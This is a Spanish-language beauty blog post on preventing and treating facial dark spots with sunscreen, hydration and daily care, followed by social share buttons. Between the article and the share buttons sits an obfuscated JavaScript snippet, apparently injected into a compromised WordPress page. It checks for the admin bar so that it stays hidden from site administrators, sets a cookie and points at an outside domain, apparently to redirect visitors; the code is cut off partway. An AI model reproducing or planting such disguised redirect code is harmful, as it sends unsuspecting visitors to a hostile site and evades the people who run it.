Las manchas en la piel suelen aparecer debido a los efectos del sol, cambios hormonales o simplemente con la edad. Estas pequeñas manchas en la cara, afectan sobretodo a las mujeres; las razones y el origen pueden tener muy diversas causas.

Para prevenir las manchas, el mejor producto que podemos aplicar es una buena crema hidratante con alta protección solar, aunque no vayamos a estar expuestos al sol. Los rayos UVA y UVB son muy dañinos para nuestra piel y siempre están ahí, sin importar la estación del año.

A todos nos gusta ir a la playa a tomar al sol cuando llega el verano, pero hay que llevar a cabo una serie de precauciones: evitar la exposición directa en las horas centrales del día, usar crema con factor de protección solar alto, intentar proteger la cabeza con gorras o sombreros… son consejos que todos deberíamos de seguir para evitar el envejecimiento prematuro de la piel.

Con la edad la piel se vuelve más fina y se reseca. Para reparar y fortalecer la epidermis y unificar el tono de la piel, debes utilizar productos adecuados que te ayudará a rehidratar la piel volviéndola lisa y más fresca.

Siguiendo unos simples cuidados de belleza diarios, observarás como tu piel comienza a recuperarse. ¡Tu  piel quedará con un aspecto más uniforme!

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone